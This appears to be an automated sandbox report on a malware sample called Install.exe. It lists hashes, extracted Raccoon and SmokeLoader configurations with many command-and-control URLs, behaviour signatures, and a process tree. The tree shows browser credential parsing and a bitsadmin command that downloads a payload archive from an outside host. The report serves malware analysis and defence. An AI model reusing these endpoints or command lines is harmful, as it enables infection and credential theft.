Resubmissions

12-11-2024 01:29

241112-bwgrxs1gnf 10

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

Analysis

  • max time kernel
    1802s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-04-2021 11:42

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 40 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:860
    • C:\Users\Admin\AppData\Roaming\jhedawg
      C:\Users\Admin\AppData\Roaming\jhedawg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5532
      • C:\Users\Admin\AppData\Roaming\jhedawg
        C:\Users\Admin\AppData\Roaming\jhedawg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5592
    • C:\Users\Admin\AppData\Roaming\uaedawg
      C:\Users\Admin\AppData\Roaming\uaedawg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4664
    • C:\Users\Admin\AppData\Roaming\jhedawg
      C:\Users\Admin\AppData\Roaming\jhedawg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:2972
      • C:\Users\Admin\AppData\Roaming\jhedawg
        C:\Users\Admin\AppData\Roaming\jhedawg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:6056
    • C:\Users\Admin\AppData\Roaming\uaedawg
      C:\Users\Admin\AppData\Roaming\uaedawg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5684
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\uqwZFUjVeWbr\uqwZFUjVeWbr.dll",uqwZFUjVeWbr
      2⤵
      • Windows security modification
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:4324
    • C:\Users\Admin\AppData\Roaming\jhedawg
      C:\Users\Admin\AppData\Roaming\jhedawg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5236
      • C:\Users\Admin\AppData\Roaming\jhedawg
        C:\Users\Admin\AppData\Roaming\jhedawg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5896
    • C:\Users\Admin\AppData\Roaming\uaedawg
      C:\Users\Admin\AppData\Roaming\uaedawg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4696
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1072
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1172
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1360
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1392
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2740
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2720
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2700
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2436
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2408
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1860
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:992
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1808
                      • C:\Users\Admin\AppData\Local\Temp\is-44DMM.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-44DMM.tmp\Install.tmp" /SL5="$30050,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1568
                        • C:\Users\Admin\AppData\Local\Temp\is-3P5UN.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-3P5UN.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3764
                          • C:\Program Files\Microsoft Office\QLLZJFNONL\ultramediaburner.exe
                            "C:\Program Files\Microsoft Office\QLLZJFNONL\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1060
                            • C:\Users\Admin\AppData\Local\Temp\is-RHD5L.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-RHD5L.tmp\ultramediaburner.tmp" /SL5="$501DA,281924,62464,C:\Program Files\Microsoft Office\QLLZJFNONL\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:3872
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:2496
                          • C:\Users\Admin\AppData\Local\Temp\44-ce31f-cd3-ecdaa-6fa30434cf805\Maetuvakylae.exe
                            "C:\Users\Admin\AppData\Local\Temp\44-ce31f-cd3-ecdaa-6fa30434cf805\Maetuvakylae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2784
                          • C:\Users\Admin\AppData\Local\Temp\94-c55d9-6a5-68090-d2c4211db6e49\Tetakylufu.exe
                            "C:\Users\Admin\AppData\Local\Temp\94-c55d9-6a5-68090-d2c4211db6e49\Tetakylufu.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1756
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vwe4pcvm.zew\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4728
                              • C:\Users\Admin\AppData\Local\Temp\vwe4pcvm.zew\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\vwe4pcvm.zew\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4908
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu1nixac.w5v\requête.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4092
                              • C:\Users\Admin\AppData\Local\Temp\lu1nixac.w5v\requête.exe
                                C:\Users\Admin\AppData\Local\Temp\lu1nixac.w5v\requête.exe
                                6⤵
                                  PID:3960
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4856
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                      parse.exe -f json -b firefox
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5496
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                      parse.exe -f json -b edge
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4292
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                      parse.exe -f json -b chrome
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4800
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lhv0ljf.kcd\google-game.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5028
                                • C:\Users\Admin\AppData\Local\Temp\0lhv0ljf.kcd\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\0lhv0ljf.kcd\google-game.exe
                                  6⤵
                                    PID:4564
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      7⤵
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:4652
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ivlb0t2k.reo\md1_1eaf.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:636
                                  • C:\Users\Admin\AppData\Local\Temp\ivlb0t2k.reo\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\ivlb0t2k.reo\md1_1eaf.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:4564
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2j3cqxxf.biz\askinstall39.exe & exit
                                  5⤵
                                    PID:4648
                                    • C:\Users\Admin\AppData\Local\Temp\2j3cqxxf.biz\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\2j3cqxxf.biz\askinstall39.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5656
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:4448
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:5972
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hlxm2ik.aia\y1.exe & exit
                                      5⤵
                                        PID:5256
                                        • C:\Users\Admin\AppData\Local\Temp\4hlxm2ik.aia\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\4hlxm2ik.aia\y1.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5128
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4hlxm2ik.aia\y1.exe"
                                            7⤵
                                              PID:4844
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                8⤵
                                                • Delays execution with timeout.exe
                                                PID:3684
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nkbiipf1.3yi\SunLabsPlayer.exe /S & exit
                                          5⤵
                                            PID:5616
                                            • C:\Users\Admin\AppData\Local\Temp\nkbiipf1.3yi\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\nkbiipf1.3yi\SunLabsPlayer.exe /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:5580
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4824
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:2316
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4720
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:4192
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5000
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:6016
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                            7⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:5152
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3960
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            7⤵
                                                            • Download via BitsAdmin
                                                            PID:3840
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pH8qPmSKUStCwU7W -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4804
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pxdRVMSXYuTEkeCR -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5684
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4860
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5004
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3856
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5704
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      8⤵
                                                                        PID:3684
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4532
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uqwZFUjVeWbr\uqwZFUjVeWbr.dll" uqwZFUjVeWbr
                                                                        7⤵
                                                                        • Loads dropped DLL
                                                                        PID:5188
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uqwZFUjVeWbr\uqwZFUjVeWbr.dll" uqwZFUjVeWbr
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          PID:5876
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5664
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:1316
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4792
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:1280
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiB30C.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4576
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5052
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wzn52dot.g32\inst.exe & exit
                                                                            5⤵
                                                                              PID:5832
                                                                              • C:\Users\Admin\AppData\Local\Temp\wzn52dot.g32\inst.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\wzn52dot.g32\inst.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5952
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qpcxxzwf.exr\GcleanerWW.exe /mixone & exit
                                                                              5⤵
                                                                                PID:6016
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ms4vif00.a5v\toolspab1.exe & exit
                                                                                5⤵
                                                                                  PID:5236
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ms4vif00.a5v\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ms4vif00.a5v\toolspab1.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4228
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ms4vif00.a5v\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\ms4vif00.a5v\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5564
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c3zizvg5.gek\app.exe /8-2222 & exit
                                                                                  5⤵
                                                                                    PID:2292
                                                                                    • C:\Users\Admin\AppData\Local\Temp\c3zizvg5.gek\app.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\c3zizvg5.gek\app.exe /8-2222
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4944
                                                                                      • C:\Users\Admin\AppData\Local\Temp\c3zizvg5.gek\app.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\c3zizvg5.gek\app.exe" /8-2222
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:3596
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iirhrznd.1sy\c7ae36fa.exe & exit
                                                                                    5⤵
                                                                                      PID:5688
                                                                                      • C:\Users\Admin\AppData\Local\Temp\iirhrznd.1sy\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\iirhrznd.1sy\c7ae36fa.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5748
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3928
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:5320
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4280
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4324
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4420
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4672
